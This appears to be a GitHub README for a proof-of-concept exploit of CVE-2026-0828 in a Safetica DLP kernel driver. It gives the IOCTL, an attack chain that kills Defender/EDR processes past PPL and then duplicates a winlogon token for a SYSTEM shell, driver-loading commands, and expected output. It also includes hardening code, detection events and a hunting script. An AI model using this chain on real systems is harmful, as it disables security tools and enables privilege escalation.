GitHub: mein-0/cve-2026-0828
# CVE-2026-0828 — Safetica ProcessMonitorDriver.sys BYOVD PoC
The Safetica DLP kernel driver (`ProcessMonitorDriver.sys`) exposes an IOCTL, reachable from any user-mode caller, that terminates an arbitrary process chosen by a PID in the input buffer via `ZwTerminateProcess` from kernel context. Because the open and the terminate run with a kernel previous mode, PPL (Protected Process Light) protection does not apply to the target.
**CVSS:** 8.8 (High) · **Type:** BYOVD, LPE · **Platform:** Windows x64
## Vulnerability
The `IRP_MJ_DEVICE_CONTROL` handler for IOCTL `0xB822200C` calls `ZwOpenProcess` with `PROCESS_ALL_ACCESS (0x1FFFFF)` and subsequently `ZwTerminateProcess` using a PID supplied directly from the input buffer — **without any privilege or caller validation.**
```c
// Vulnerable handler (IDA pseudocode, cleaned up)
// METHOD_BUFFERED: the caller's input buffer has been copied to SystemBuffer.
ClientId.UniqueProcess = *(HANDLE *)irp->AssociatedIrp.SystemBuffer; // PID straight from user input, length unchecked
ClientId.UniqueThread  = NULL;
InitializeObjectAttributes(&ObjectAttributes, NULL, OBJ_KERNEL_HANDLE, NULL, NULL); // attribute setup not shown in the decompilation
// Kernel-mode open with PROCESS_ALL_ACCESS: no access check, no PPL check
ZwOpenProcess(&ProcessHandle, 0x1FFFFFu, &ObjectAttributes, &ClientId);
ZwTerminateProcess(ProcessHandle, 0); // no SeSinglePrivilegeCheck, no ExGetPreviousMode check
```

Because `ZwOpenProcess` is called from kernel mode, the previous mode is `KernelMode`: the object manager skips both the access check and the protected-process check that would deny a user-mode open of a PPL process. PPL-protected processes (Windows Defender, EDR agents) can therefore be opened with `PROCESS_ALL_ACCESS` and terminated on behalf of any caller that can send the IOCTL.
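As an added example (not code from this PoC repository, from the KOSEC advisory, or from Safetica), the C below does two things a reviewer of this bug would want. It decodes the IOCTL code `0xB822200C` into its `CTL_CODE` fields, confirming METHOD_BUFFERED (which is why the handler reads `AssociatedIrp.SystemBuffer`) and FILE_ANY_ACCESS (no particular access rights on the device handle are needed to send it). It then models, on the host, the checks a fixed dispatch routine should apply before touching the PID: input-length validation, a `SeSinglePrivilegeCheck(SeDebugPrivilege)` gate for user-mode requestors, and a protected-process check for user-mode requestors. The `irp_model` struct, `HANDLE_T` and the `hardened_terminate_dispatch` name are assumed stand-ins for the kernel structures and the vendor's real handler; the `STATUS_*` values are the real NTSTATUS codes. One caveat the page's "privilege check added" fix summary does not spell out: an administrator already holds SeDebugPrivilege, so a privilege check alone confines the primitive to administrators rather than removing the PPL bypass. To close that, the driver also has to open the target with the caller's access mode (for example `ObOpenObjectByPointer(..., UserMode, ...)` after `PsLookupProcessByProcessId`) so that the normal access check, which is where PPL is enforced for user-mode opens, applies; step 3 in the model stands in for that.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* CTL_CODE layout from wdm.h:
 *   DeviceType [31:16] | RequiredAccess [15:14] | Function [13:2] | Method [1:0] */
enum { METHOD_BUFFERED = 0, METHOD_IN_DIRECT = 1, METHOD_OUT_DIRECT = 2, METHOD_NEITHER = 3 };
enum { FILE_ANY_ACCESS = 0, FILE_READ_ACCESS = 1, FILE_WRITE_ACCESS = 2 };

struct ioctl_fields { uint32_t device_type, access, function, method; };

struct ioctl_fields decode_ioctl(uint32_t code)
{
    struct ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFFu;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2)  & 0xFFFu;
    f.method      =  code        & 0x3u;
    return f;
}

/* Real NTSTATUS values the fixed handler should return. */
#define STATUS_SUCCESS            0x00000000u
#define STATUS_INVALID_PARAMETER  0xC000000Du
#define STATUS_ACCESS_DENIED      0xC0000022u
#define STATUS_BUFFER_TOO_SMALL   0xC0000023u
#define STATUS_PRIVILEGE_NOT_HELD 0xC0000061u

/* Host-side stand-ins (assumed, not kernel definitions) for what the dispatch
 * routine reads from the IRP and learns from the kernel. */
typedef uint64_t HANDLE_T;                 /* HANDLE is 8 bytes on x64 */
enum { KernelMode = 0, UserMode = 1 };     /* KPROCESSOR_MODE */
struct irp_model {
    const uint8_t *system_buffer;  /* Irp->AssociatedIrp.SystemBuffer (METHOD_BUFFERED) */
    size_t input_length;           /* IrpSp->Parameters.DeviceIoControl.InputBufferLength */
    int    requestor_mode;         /* Irp->RequestorMode / ExGetPreviousMode() */
    bool   caller_has_debug_priv;  /* SeSinglePrivilegeCheck(SeDebugPrivilege, UserMode) */
    bool   target_is_protected;    /* PsIsProtectedProcess() on the looked-up target */
};

/* The checks the vulnerable handler omits, in the order a fixed one should apply them.
 * On STATUS_SUCCESS, *pid_out holds the PID that may then be opened with
 * PROCESS_TERMINATE (not PROCESS_ALL_ACCESS) using the caller's access mode. */
uint32_t hardened_terminate_dispatch(const struct irp_model *irp, HANDLE_T *pid_out)
{
    HANDLE_T pid;
    *pid_out = 0;

    /* 1. Never dereference SystemBuffer without checking the declared input length. */
    if (irp->system_buffer == NULL || irp->input_length < sizeof(HANDLE_T))
        return STATUS_BUFFER_TOO_SMALL;

    /* 2. A user-mode requestor must hold SeDebugPrivilege; kernel callers are trusted. */
    if (irp->requestor_mode == UserMode && !irp->caller_has_debug_priv)
        return STATUS_PRIVILEGE_NOT_HELD;

    memcpy(&pid, irp->system_buffer, sizeof pid);   /* memcpy: the buffer need not be aligned */
    if (pid == 0 || pid == 4)                       /* Idle and System are never valid targets */
        return STATUS_INVALID_PARAMETER;

    /* 3. PPL: a user-mode caller must not reach a protected target through the driver.
     *    In a real driver this comes from opening with AccessMode == UserMode, which
     *    lets the object manager's access check reject protected processes. */
    if (irp->requestor_mode == UserMode && irp->target_is_protected)
        return STATUS_ACCESS_DENIED;

    *pid_out = pid;
    return STATUS_SUCCESS;
}

int main(void)
{
    struct ioctl_fields f = decode_ioctl(0xB822200Cu);
    printf("IOCTL 0xB822200C: DeviceType=0x%X Function=0x%X Method=%u (%s) Access=%u (%s)\n",
           f.device_type, f.function, f.method,
           f.method == METHOD_BUFFERED ? "METHOD_BUFFERED" : "other",
           f.access, f.access == FILE_ANY_ACCESS ? "FILE_ANY_ACCESS" : "restricted");

    /* Constructed request: an 8-byte little-endian PID 3412 (0x0D54), as the PoC would send. */
    uint8_t buf[8] = { 0x54, 0x0D, 0, 0, 0, 0, 0, 0 };
    struct irp_model req = { buf, sizeof buf, UserMode, false, true };
    HANDLE_T pid;
    printf("unprivileged user    -> 0x%08X\n", hardened_terminate_dispatch(&req, &pid));
    req.caller_has_debug_priv = true;
    printf("admin, PPL target    -> 0x%08X\n", hardened_terminate_dispatch(&req, &pid));
    req.target_is_protected = false;
    printf("admin, normal target -> 0x%08X pid=%llu\n",
           hardened_terminate_dispatch(&req, &pid), (unsigned long long)pid);
    return 0;
}
```

The decode is worth running once: function 0x803 in device type 0xB822 with METHOD_BUFFERED is consistent with the `SystemBuffer` read in the pseudocode, and FILE_ANY_ACCESS means the I/O manager will forward the request on any handle to the device, so the device object's DACL and the handler's own checks are the only gates.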
**Affected versions:** Safetica < 11.26.19 / < 10.5.150
**Fixed in:** Safetica 11.26.19, 11.29.8, 10.5.150 — privilege check added to IOCTL handler
**References:** [KOSEC Advisory](https://kosec.io/2025/11/01/safetica-byovd.html) · [CERT VU#818729](https://kb.cert.org/vuls/id/818729)
## Attack Chain
```
Admin privileges
│
├─► Load ProcessMonitorDriver.sys
│     sc create STProcessMonitor type= kernel binPath= ...
│
├─► PHASE 1: Kill EDR via IOCTL 0xB822200C
│     DeviceIoControl(\\.\STProcessMonitorDriver, 0xB822200C, &pid, 8, ...)
│     → ZwTerminateProcess(Defender/EDR, 0)   [kernel ctx, PPL bypassed]
│
└─► PHASE 2: Token duplication → SYSTEM shell
      AdjustTokenPrivileges(SeDebugPrivilege)
      OpenProcess(winlogon.exe) → OpenProcessToken(TOKEN_DUPLICATE)
      DuplicateTokenEx(TokenPrimary)
      CreateProcessWithTokenW(cmd.exe)
      → NT AUTHORITY\SYSTEM
```

Loading the driver needs administrator rights (`SeLoadDriverPrivilege`), so the driver's contribution is Phase 1: the PPL-bypassing kill of Defender or EDR processes. Phase 2 is the standard administrator-to-SYSTEM token theft; it needs only `SeDebugPrivilege` and `SeImpersonatePrivilege`, which an administrator already holds, and does not use the driver at all.
## Files
| File | Description |
|---|---|
| `exploit.c` | Full PoC — kills EDR, spawns NT AUTHORITY\SYSTEM cmd.exe |
## Build
Requires Visual Studio (x64 Native Tools Command Prompt):
```
cl.exe /W3 /O1 /nologo exploit.c /Fe:exploit.exe
```
## Usage
**Step 1 — Load the driver** (Admin CMD):
```
sc create STProcessMonitor type= kernel binPath= "C:\path\to\ProcessMonitorDriver.sys"
sc start STProcessMonitor
```
**Step 2 — Run the PoC:**
```
exploit.exe
```
**Expected output:**
```
[Phase 1] Killing EDR via CVE-2026-0828...
  MsMpEng.exe PID 3412 -> KILLED
  NisSrv.exe PID 4180 -> KILLED
SeDebugPrivilege enabled
winlogon.exe -> pid 560
[+] Got SYSTEM token handle.
[+] Token duplicated.
shell spawned
```
A new `cmd.exe` window opens as `NT AUTHORITY\SYSTEM`.
## Detection
**Event ID 7045** (System log, source Service Control Manager) — new kernel service installation:

```
Service Name: STProcessMonitor
Service File Name: ...\ProcessMonitorDriver.sys
Service Type: kernel mode driver
```

**Sysmon Event ID 6** (DriverLoad) — records the loaded image path and its hashes, so the SHA256 below can be matched directly at load time.

**WDAC blocklist (SHA256):**

```
70bcec00c215fe52779700f74e9bd669ff836f594df92381cbfb7ee0568e7a8b
```

**Device access:** there is no built-in ETW event for `DeviceIoControl` itself. What is observable is the user-mode `CreateFile` open of `\\.\STProcessMonitorDriver` (handle or file-object telemetry from an EDR or a filter driver), and the consequence: Defender or EDR processes such as `MsMpEng.exe` exiting without a corresponding service stop.
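The following PowerShell is an added hunting example, not part of the PoC repository or of any vendor guidance. It assumes Sysmon is installed with driver-load logging enabled (Event ID 6) and that the hunt runs on the host itself with rights to read the System and Sysmon logs; the service name, driver file name and SHA256 are taken from this page.

```powershell
# Added example: hunt for the BYOVD load described on this page.
# Assumes Sysmon with Event ID 6 (DriverLoad) enabled; indicators come from this page.
$ServiceName = 'STProcessMonitor'
$DriverFile  = 'ProcessMonitorDriver.sys'
$BadHash     = '70BCEC00C215FE52779700F74E9BD669FF836F594DF92381CBFB7EE0568E7A8B'

# 1. Service Control Manager: new service installations (System log, Event ID 7045)
$installs = Get-WinEvent -FilterHashtable @{LogName='System'; ProviderName='Service Control Manager'; Id=7045} -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match [regex]::Escape($DriverFile) -or $_.Message -match $ServiceName }
foreach ($e in $installs) {
    "{0} 7045 service install: {1}" -f $e.TimeCreated, ($e.Message -replace '\s+', ' ')
}

# 2. Sysmon Event ID 6 (DriverLoad): the message carries ImageLoaded and Hashes
$loads = Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=6} -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match [regex]::Escape($DriverFile) -or $_.Message -match $BadHash }
foreach ($e in $loads) {
    "{0} Sysmon 6 driver load: {1}" -f $e.TimeCreated, ($e.Message -replace '\s+', ' ')
}

# 3. Is the driver service registered right now, and does its binary match the blocklisted hash?
$drv = Get-CimInstance Win32_SystemDriver -Filter "Name='$ServiceName'" -ErrorAction SilentlyContinue
if ($drv) {
    "Driver service present: {0} State={1} Path={2}" -f $drv.Name, $drv.State, $drv.PathName
    $path = $drv.PathName -replace '^\\\?\?\\', ''      # strip a leading \??\ NT-path prefix if present
    if (Test-Path -LiteralPath $path) {
        $h = (Get-FileHash -Algorithm SHA256 -LiteralPath $path).Hash
        if ($h -eq $BadHash) { "MATCH: $path has the known-vulnerable SHA256" }
        else { "Hash $h does not match the blocklisted hash on this page" }
    }
} else {
    "No driver service named $ServiceName is registered"
}
```

An attacker can pick any service name, so the 7045 match on the file name and the Sysmon 6 match on the hash are the durable signals; the service-name check in step 3 only catches this PoC's default. Pair these with an alert on `MsMpEng.exe` or the EDR agent exiting without a service stop, which is the effect Phase 1 produces regardless of how the driver was loaded.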
## Tested On
- Windows 10 22H2 x64